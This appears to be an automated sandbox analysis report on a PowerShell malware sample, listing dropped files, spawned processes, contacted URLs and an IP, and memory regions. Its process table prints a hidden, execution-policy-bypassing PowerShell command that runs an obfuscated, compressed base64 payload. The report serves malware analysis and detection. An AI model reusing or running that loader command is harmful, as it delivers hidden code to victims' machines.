Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x6bjOrKFQn.ps1
|
ASCII text, with very long lines (26529)
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES45B2.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Sat Oct 26 13:16:49 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4eysaxf.3ft.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fknazxxb.my5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4u1nkdm.gc2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zeryh4z0.0ra.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.0.cs
|
Unicode text, UTF-8 (with BOM) text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36U39KFQJEE78T6R9Y9Q.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF594778.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NPJMGXIC699F92ASQKVD.temp
|
data
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object
System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp"
"c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 4 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
206.41.208.89
|
unknown
|
United States
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE6110000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
1E25F320000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
|
9397237000
|
stack
|
page read and write
|
||
|
2159E320000
|
heap
|
page read and write
|
||
|
2159E2E2000
|
heap
|
page read and write
|
||
|
15DA21A0000
|
heap
|
page read and write
|
||
|
2159E302000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2159FC10000
|
heap
|
page read and write
|
||
|
1E25C030000
|
heap
|
page read and write
|
||
|
1E276209000
|
heap
|
page read and write
|
||
|
2159E280000
|
heap
|
page read and write
|
||
|
1E27617E000
|
heap
|
page read and write
|
||
|
1E25D850000
|
heap
|
page readonly
|
||
|
1FDFE8FB000
|
heap
|
page read and write
|
||
|
1E26DF8F000
|
trusted library allocation
|
page read and write
|
||
|
2159E560000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
9397179000
|
stack
|
page read and write
|
||
|
2159E315000
|
heap
|
page read and write
|
||
|
1FDFE717000
|
heap
|
page read and write
|
||
|
2159E2C1000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2159E2B1000
|
heap
|
page read and write
|
||
|
7FFD9BDD0000
|
trusted library allocation
|
page read and write
|
||
|
5F5413A000
|
stack
|
page read and write
|
||
|
1E25BD78000
|
heap
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
1E25D8C0000
|
heap
|
page read and write
|
||
|
5F543BB000
|
stack
|
page read and write
|
||
|
1E276057000
|
heap
|
page execute and read and write
|
||
|
1FDE4624000
|
heap
|
page read and write
|
||
|
1E275DB0000
|
heap
|
page read and write
|
||
|
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F54D8F000
|
stack
|
page read and write
|
||
|
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
|
1E25BE36000
|
heap
|
page read and write
|
||
|
2159E2A4000
|
heap
|
page read and write
|
||
|
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2159E2BA000
|
heap
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE5FD0000
|
heap
|
page read and write
|
||
|
5F5423E000
|
stack
|
page read and write
|
||
|
1E276206000
|
heap
|
page read and write
|
||
|
1E25F43E000
|
trusted library allocation
|
page read and write
|
||
|
1FDE44C0000
|
heap
|
page read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
215A1050000
|
direct allocation
|
page read and write
|
||
|
5F5433E000
|
stack
|
page read and write
|
||
|
2159FBC7000
|
direct allocation
|
page read and write
|
||
|
1FDE6630000
|
heap
|
page execute and read and write
|
||
|
2159E2C3000
|
heap
|
page read and write
|
||
|
1E25BE05000
|
heap
|
page read and write
|
||
|
1FDE4665000
|
heap
|
page read and write
|
||
|
215A0FD0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE705000
|
heap
|
page read and write
|
||
|
1FDE4592000
|
heap
|
page read and write
|
||
|
2159E32E000
|
heap
|
page read and write
|
||
|
2159E2BB000
|
heap
|
page read and write
|
||
|
1E25D770000
|
heap
|
page read and write
|
||
|
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
15DA2280000
|
heap
|
page read and write
|
||
|
2159E2C3000
|
heap
|
page read and write
|
||
|
1FDF68C1000
|
trusted library allocation
|
page read and write
|
||
|
1E25D860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
2159E2D6000
|
heap
|
page read and write
|
||
|
93973BE000
|
stack
|
page read and write
|
||
|
1E2761D9000
|
heap
|
page read and write
|
||
|
2159FBE0000
|
direct allocation
|
page read and write
|
||
|
215A1070000
|
direct allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9396AD5000
|
stack
|
page read and write
|
||
|
26AF8FC000
|
stack
|
page read and write
|
||
|
1FDE66CB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
|
5F53F78000
|
stack
|
page read and write
|
||
|
1E25DC82000
|
heap
|
page read and write
|
||
|
9397339000
|
stack
|
page read and write
|
||
|
1E2761D1000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE8C0000
|
heap
|
page read and write
|
||
|
2159E315000
|
heap
|
page read and write
|
||
|
2159E2AA000
|
heap
|
page read and write
|
||
|
1FDE8672000
|
trusted library allocation
|
page read and write
|
||
|
1E25D776000
|
heap
|
page read and write
|
||
|
2159E2B3000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE875F000
|
trusted library allocation
|
page read and write
|
||
|
1FDF67C1000
|
trusted library allocation
|
page read and write
|
||
|
1FDE87BB000
|
trusted library allocation
|
page read and write
|
||
|
1FDF6641000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
1E25F26C000
|
trusted library allocation
|
page read and write
|
||
|
1E25BE27000
|
heap
|
page read and write
|
||
|
5F53CFE000
|
stack
|
page read and write
|
||
|
5F53E7E000
|
stack
|
page read and write
|
||
|
1E25EBE9000
|
trusted library allocation
|
page read and write
|
||
|
1FDE5FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
2159E2BB000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
215A1010000
|
direct allocation
|
page read and write
|
||
|
9396F7D000
|
stack
|
page read and write
|
||
|
1E275DD5000
|
heap
|
page read and write
|
||
|
2159E2CA000
|
heap
|
page read and write
|
||
|
2159E2B3000
|
heap
|
page read and write
|
||
|
1FDE4626000
|
heap
|
page read and write
|
||
|
2159E325000
|
heap
|
page read and write
|
||
|
1FDE60C0000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
1E25D760000
|
trusted library allocation
|
page read and write
|
||
|
93974BF000
|
stack
|
page read and write
|
||
|
2159E2BC000
|
heap
|
page read and write
|
||
|
2159E2BB000
|
heap
|
page read and write
|
||
|
1FDE6872000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE90D000
|
heap
|
page read and write
|
||
|
1E2761E7000
|
heap
|
page read and write
|
||
|
7FFD9BB42000
|
trusted library allocation
|
page read and write
|
||
|
5F53DFE000
|
stack
|
page read and write
|
||
|
1FDE8B06000
|
trusted library allocation
|
page read and write
|
||
|
1FDF666A000
|
trusted library allocation
|
page read and write
|
||
|
215A0FF0000
|
direct allocation
|
page read and write
|
||
|
1FDE646C000
|
heap
|
page read and write
|
||
|
7DF4D38E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
215A10A1000
|
direct allocation
|
page read and write
|
||
|
1FDE5F90000
|
heap
|
page readonly
|
||
|
7FFD9B9B7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE5F80000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE8B0000
|
heap
|
page execute and read and write
|
||
|
1E25BC60000
|
heap
|
page read and write
|
||
|
1E25BE02000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E25DE39000
|
trusted library allocation
|
page read and write
|
||
|
2159E2C2000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1FDE6641000
|
trusted library allocation
|
page read and write
|
||
|
1FDE5F50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
9396B5D000
|
stack
|
page read and write
|
||
|
2159E320000
|
heap
|
page read and write
|
||
|
1FDE5FD5000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2159E2CA000
|
heap
|
page read and write
|
||
|
939753C000
|
stack
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
1E25DFD9000
|
trusted library allocation
|
page read and write
|
||
|
15DA22D0000
|
heap
|
page read and write
|
||
|
7FFD9BA5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E2761A6000
|
heap
|
page read and write
|
||
|
1E25FE3E000
|
trusted library allocation
|
page read and write
|
||
|
1FDE461B000
|
heap
|
page read and write
|
||
|
1E25BE48000
|
heap
|
page read and write
|
||
|
1FDFE8DC000
|
heap
|
page read and write
|
||
|
1FDE8B02000
|
trusted library allocation
|
page read and write
|
||
|
2159FC20000
|
heap
|
page read and write
|
||
|
1E26DF92000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE70F000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB51000
|
trusted library allocation
|
page read and write
|
||
|
5F54036000
|
stack
|
page read and write
|
||
|
2159E32F000
|
heap
|
page read and write
|
||
|
1E25BE4C000
|
heap
|
page read and write
|
||
|
1E25BE0F000
|
heap
|
page read and write
|
||
|
215A10C0000
|
direct allocation
|
page read and write
|
||
|
1E25D77A000
|
heap
|
page read and write
|
||
|
2159FBDD000
|
direct allocation
|
page read and write
|
||
|
1FDF6715000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9BB000
|
trusted library allocation
|
page read and write
|
||
|
1FDE4588000
|
heap
|
page read and write
|
||
|
1FDFE760000
|
heap
|
page read and write
|
||
|
7FFD9BA86000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E25E16E000
|
trusted library allocation
|
page read and write
|
||
|
1E25DC40000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE671000
|
heap
|
page read and write
|
||
|
939743E000
|
stack
|
page read and write
|
||
|
1FDFE686000
|
heap
|
page read and write
|
||
|
1FDE60E0000
|
heap
|
page execute and read and write
|
||
|
2159E312000
|
heap
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
2159E32C000
|
heap
|
page read and write
|
||
|
5F541BE000
|
stack
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB94000
|
trusted library allocation
|
page read and write
|
||
|
1E275F70000
|
heap
|
page execute and read and write
|
||
|
26AFAFE000
|
stack
|
page read and write
|
||
|
1FDE7C72000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
1FDE6010000
|
trusted library allocation
|
page read and write
|
||
|
939707F000
|
stack
|
page read and write
|
||
|
2159E2B3000
|
heap
|
page read and write
|
||
|
2159E2C3000
|
heap
|
page read and write
|
||
|
1E25C060000
|
heap
|
page read and write
|
||
|
2159E230000
|
heap
|
page read and write
|
||
|
15DA22D4000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
|
1E25F15A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDFE683000
|
heap
|
page read and write
|
||
|
93971BE000
|
stack
|
page read and write
|
||
|
5F538D5000
|
stack
|
page read and write
|
||
|
2159E317000
|
heap
|
page read and write
|
||
|
9396E7E000
|
stack
|
page read and write
|
||
|
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
|
2159E315000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
2159E2CA000
|
heap
|
page read and write
|
||
|
1E25BE70000
|
heap
|
page read and write
|
||
|
1FDE4530000
|
heap
|
page read and write
|
||
|
2159E30D000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
2159E298000
|
heap
|
page read and write
|
||
|
1E26E0B2000
|
trusted library allocation
|
page read and write
|
||
|
A0B65FE000
|
stack
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
1E25BD70000
|
heap
|
page read and write
|
||
|
1E25D8A0000
|
heap
|
page read and write
|
||
|
1E275E9B000
|
heap
|
page read and write
|
||
|
2159E2C7000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
2159FB80000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
2159E2C5000
|
heap
|
page read and write
|
||
|
15DA2349000
|
heap
|
page read and write
|
||
|
2159E317000
|
heap
|
page read and write
|
||
|
1FDFE8B7000
|
heap
|
page execute and read and write
|
||
|
1E275DF9000
|
heap
|
page read and write
|
||
|
1E25BE2E000
|
heap
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
1E276050000
|
heap
|
page execute and read and write
|
||
|
1FDFE703000
|
heap
|
page read and write
|
||
|
5F539DE000
|
stack
|
page read and write
|
||
|
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
215A10B0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
1FDE6610000
|
trusted library section
|
page read and write
|
||
|
1E276160000
|
heap
|
page read and write
|
||
|
2159E2D1000
|
heap
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
A0B67FE000
|
stack
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
1FDE8A3C000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE640000
|
heap
|
page read and write
|
||
|
7FFD9BB82000
|
trusted library allocation
|
page read and write
|
||
|
1E25BE00000
|
heap
|
page read and write
|
||
|
1E25F435000
|
trusted library allocation
|
page read and write
|
||
|
2159FBC3000
|
direct allocation
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
1E25E1E9000
|
trusted library allocation
|
page read and write
|
||
|
93972B8000
|
stack
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE4555000
|
heap
|
page read and write
|
||
|
2159E2BE000
|
heap
|
page read and write
|
||
|
26AF9FF000
|
stack
|
page read and write
|
||
|
1E25DDB1000
|
trusted library allocation
|
page read and write
|
||
|
1E25DDA0000
|
heap
|
page execute and read and write
|
||
|
1FDF6650000
|
trusted library allocation
|
page read and write
|
||
|
5F5395E000
|
stack
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
1E25DC10000
|
trusted library allocation
|
page read and write
|
||
|
1FDE4667000
|
heap
|
page read and write
|
||
|
1E2761CE000
|
heap
|
page read and write
|
||
|
2159E2AE000
|
heap
|
page read and write
|
||
|
7FFD9BDC0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE6620000
|
direct allocation
|
page execute and read and write
|
||
|
215A10A3000
|
direct allocation
|
page read and write
|
||
|
1FDE7272000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
5F53EFC000
|
stack
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
1E26E0AE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
|
9396EFE000
|
stack
|
page read and write
|
||
|
7FFD9BDB0000
|
trusted library allocation
|
page read and write
|
||
|
5F540B9000
|
stack
|
page read and write
|
||
|
1E26E09F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB6A000
|
trusted library allocation
|
page read and write
|
||
|
2159E2B3000
|
heap
|
page read and write
|
||
|
1FDE8734000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
|
9396FFB000
|
stack
|
page read and write
|
||
|
1FDF66B5000
|
trusted library allocation
|
page read and write
|
||
|
5F53D7B000
|
stack
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
215A10C0000
|
direct allocation
|
page read and write
|
||
|
1E25D774000
|
heap
|
page read and write
|
||
|
1E26DE25000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE67B000
|
heap
|
page read and write
|
||
|
2159E2CA000
|
heap
|
page read and write
|
||
|
93970FD000
|
stack
|
page read and write
|
||
|
9397F0E000
|
stack
|
page read and write
|
||
|
1FDE466B000
|
heap
|
page read and write
|
||
|
2159E2BB000
|
heap
|
page read and write
|
||
|
1E275E41000
|
heap
|
page read and write
|
||
|
2159E2F9000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
2159FBE0000
|
direct allocation
|
page read and write
|
||
|
1E25BE30000
|
heap
|
page read and write
|
||
|
1E25D840000
|
trusted library allocation
|
page read and write
|
||
|
1FDFE72A000
|
heap
|
page read and write
|
||
|
2159E2CA000
|
heap
|
page read and write
|
||
|
2159E150000
|
heap
|
page read and write
|
||
|
1E25BDC2000
|
heap
|
page read and write
|
||
|
2159FC14000
|
heap
|
page read and write
|
||
|
5F53C7D000
|
stack
|
page read and write
|
||
|
7FFD9B9A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDFE6C1000
|
heap
|
page read and write
|
||
|
2159E250000
|
heap
|
page read and write
|
||
|
215A1030000
|
direct allocation
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
1FDE44F0000
|
heap
|
page read and write
|
||
|
5F53FBE000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1FDE4580000
|
heap
|
page read and write
|
||
|
15DA2340000
|
heap
|
page read and write
|
||
|
2159E564000
|
heap
|
page read and write
|
||
|
2159E2E2000
|
heap
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
1FDE5FE1000
|
trusted library allocation
|
page read and write
|
||
|
2159E2CA000
|
heap
|
page read and write
|
||
|
2159E2F2000
|
heap
|
page read and write
|
||
|
1FDE4550000
|
heap
|
page read and write
|
||
|
2159FBDB000
|
direct allocation
|
page read and write
|
||
|
1E276083000
|
heap
|
page read and write
|
||
|
7FFD9B9CB000
|
trusted library allocation
|
page read and write
|
||
|
1E25C064000
|
heap
|
page read and write
|
||
|
9396BDE000
|
stack
|
page read and write
|
||
|
1FDE463C000
|
heap
|
page read and write
|
||
|
2159E32F000
|
heap
|
page read and write
|
||
|
1E25BD40000
|
heap
|
page read and write
|
||
|
7FFD9BA56000
|
trusted library allocation
|
page read and write
|
||
|
1E276080000
|
heap
|
page read and write
|
||
|
15DA22A0000
|
heap
|
page read and write
|
||
|
A0B63F7000
|
stack
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
2159FBC0000
|
direct allocation
|
page read and write
|
||
|
1E25E16C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
215A1090000
|
direct allocation
|
page read and write
|
||
|
1E26DDB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
|
1FDE4620000
|
heap
|
page read and write
|
||
|
7FFD9BB5A000
|
trusted library allocation
|
page read and write
|
||
|
1E26DDC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
1FDE44D0000
|
heap
|
page read and write
|
There are 358 hidden memdumps, click here to show them.